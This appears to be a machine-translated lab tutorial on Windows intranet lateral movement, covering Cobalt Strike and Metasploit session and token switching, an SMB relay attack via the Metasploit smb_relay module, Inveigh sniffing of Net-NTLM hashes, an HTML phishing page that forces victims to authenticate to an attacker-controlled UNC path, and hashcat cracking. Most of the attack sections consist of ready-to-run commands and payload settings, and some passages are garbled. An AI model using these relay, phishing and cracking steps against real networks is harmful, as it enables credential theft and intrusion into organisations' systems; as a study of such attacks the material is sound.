Intranet lateral movement - NTLM-Relay replay & Responder relay attack & Ldap & Ews
1. Pre-understanding
Security issues related to NLTM authentication mainly include Pass The Hash, information collection using NTLM, Net-NTLM Hash cracking, and NTLM Relay. PTH reproduced the previous article, using mimikatz, some scripts of the impacket toolkit, CS, etc. can be used, NTLM Relay also includes (relay to smb, ldap, ews) can be used
when the plaintext or HASH cannot be obtained. , but also pay attention to the necessary conditions of the technique.
1.1. Switch permissions between MSF and CS
When normal CS or MSF goes online, our goal is usually for ordinary users to go online, how to upgrade to system permissions, but sometimes we need to use administrator, which will cause us to have no session to connect, so here is an introduction, how to switch At the same time, it should be noted that low-privilege sessions cannot be switched to high-privilege, but high-privilege can be switched to low-privilege, which is equivalent to system permissions can be switched to administrator, but webadmin permissions cannot be switched to administrator permissions. This is something to be aware of.
To put it simply, we need to obtain the highest authority to lower the authority.
1.1.1. Switch permissions in a CS session
First, use the high privileges in the CS session to view the process, observe which processes are running with administrator privileges, then record the PID value of this process, and then switch the PID value.
1.1.1.1. View process
Here I will show you in advance, my current authority is system authority, and then use ps to check which ones are administrator authority and then run, here I see a PID number 2336.
ps ##查看运行进程
1.1.1.2. Permissions Permissions
Here you can see that I successfully switched permissions.
steal_token 2336 ##切换权限 2336 是PID进程号
1.1.2. Switch permission in MSF session
I will not talk about the process here, it is the same operation, it is to check the process and record the PID, and then switch, but the switch command is a little different.
migrate 1992 #1992是PID号
2. NTLM relay attack—Relay replay—SMB online
When using Relay to replay, there needs to be a precondition. This condition is that the accounts and passwords of the two parties that need to communicate are the same. For example: Windows server 2012 DC has administrator/admin@123, and at the same time, although the host in the Windows server 2008 domain logs in It is 0day/webadmin, but if the administrator account and password are the same as the DC, then you can access, because the default is to use the current account password to verify with the other party's account password when accessing.
2.1. Case test
Here we test the DC, the case configuration is as follows:
域控DC:192.168.3.142 administrator/admin@123
域内主机:192.168.3.10 administrator/admin@123
webadmin/admin@123
It can also be seen from the above that the passwords are the same, only the accounts are different, so let’s test to see if the previous statement is verified.
2.1.1. Same account password test
I also switched the host in the domain to the administrator to test. According to this condition, the domain controller DC and the host in the domain have the same account password at this time, and you can see that you can directly access it without any error.
2.1.2. Different accounts with the same password test
I switched the host in the domain to webadmin to test. According to the conditions, there are different accounts at present, but the passwords are the same. You can see that the access is directly denied here. Of course, the account password should be wrong here. The access denied here should be Domain controller setting permissions problem.
2.2. CS linkage MSF test
First let the hosts in the domain go online with CS. Since there is no corresponding function in CS, you need to use the linkage MSF for testing. At the same time, you need to escalate the transferred session rights to system for execution.
As for the online operation of CS, I won't say much here.
2.2.1. CS forwarding MSF online
In the previous article, it has been introduced that CS forwarding MSF is online, so I won’t mention it here, just look at the operation directly, and I won’t introduce it.
2.2.1.1. Case Operation
Note that you must run first, and then operate CS, otherwise it is easy to fail to monitor.
CS:新建会话,会话选择监听的那个MSF,也可以使用命令:spawn msf
MSF:设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 3010
run
2.2.1.2. Add route
Since the domain controller is in the internal network, it is necessary to add a corresponding route to the session, so that MSF can connect to the host in the domain.
run autoroute -p ##查看当前路由表
run post/multi/manage/autoroute ##添加当前路由表
backgroup ##返回
2.2.2. Replay module attack
Here you need to use the SMB replay module to attack. After reading the following operations here, you can understand it by looking at the picture. The same prerequisite is that the account and password are the same to be successful. If they are different, they cannot be exploited.
2.2.2.1. Module Settings
Here I directly said that it was not successful, only the hash value was returned, but the session was not established. I checked and found that many articles on the Internet were unsuccessful, but some said that the 64-bit system was unsuccessful, but the 32-bit system was successful. Oh, this... so I don't want to switch to the 32-bit system for testing. If only the 32-bit system can succeed, it is really too tasteless. At the same time, there is another situation. The current updated msf is all new, will it It is caused by a small bug in the msf module.
use exploit/windows/smb/smb_relay
set smbhost 192.168.3.142 #攻击目标
set lhost 192.168.10.20 #设置本地 IP
set autorunscript post/windows/manage/migrate
set payload windows/meterpreter/bind_tcp ##设置正向连接
set rhost 192.168.3.142 #设置连接目标
run
2.2.2.2. Access Settings
Here it is necessary to access the address of the attacking host on the controlled host. In simple terms, the accused host accesses the attacking machine and sends the self-generated account password to the attacking machine, allowing the attacking machine to obtain the account and password before accessing the domain controller. Realize attack aircraft relay interception online.
At the same time, you need to pay attention to use administrator privileges to operate.
dir \\192.168.10.20\c$
3. NTLM relay attack-Inveigh sniffing-Hash cracking
This attack method is that the attacker forges an SMB server on the controlled host. When a machine in the intranet conducts SMB access to the controlled host, the host in the intranet first accesses the attacker’s forged SMB server, and then the forged SMB server The server then replays the access traffic to the controlled host. During this process, the intranet host has no sense, but the hash values of the user accounts and passwords accessed by the intranet host are all obtained by the forged SMB server.
Here, because my virtual machine does not have more than .net3.5, and I don’t know why it can’t be installed, it’s quite troublesome, so I directly borrowed from others to add dictation, mainly because the operation is very simple and not complicated, so I didn’t bother to do it.
3.1. Enable monitoring
It is not recommended to put this monitoring locally to monitor, which is prone to problems. Since the tool is not very large, it can be uploaded to the controlled server. If it is killed in actual situations, then it can only be monitored locally.
What needs to be noted here is that if monitoring is enabled, all hosts on the intranet must access this host. For example, if the host with monitoring enabled is a domain controller, then the hosts in your domain do not access the SMB of the domain controller, so they will not be able to monitor.
Inveigh.exe
3.2. Start interception
The same is true here, you must visit the host in the domain that is being monitored, otherwise you will not be able to obtain it.
dir \\192.168.3.x\c$
3.3. Phishing pages
There may be a problem here, that is, I usually don’t access the domain controller host, and whoever is idle is fine, use dir to access, and the users in the domain are all office workers, and they don’t know how to do these operations, so you need to set a Phishing pages are mounted in the internal web decryption, or you actively send them to hosts in the domain.
<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<img src="file:///\\192.168.3.32\2">
</body>
</html>
3.4. Deciphering the ciphertext
But there is a problem here. If the configuration of the virtual machine is not enough, an error will be reported. This cracking may require encryption calculations and then comparison, so the configuration is low, and it may not be able to run so concurrently. Looking at the configuration, 4h4g is required...
hashcat -m 5600 hash1 pass2.txt --show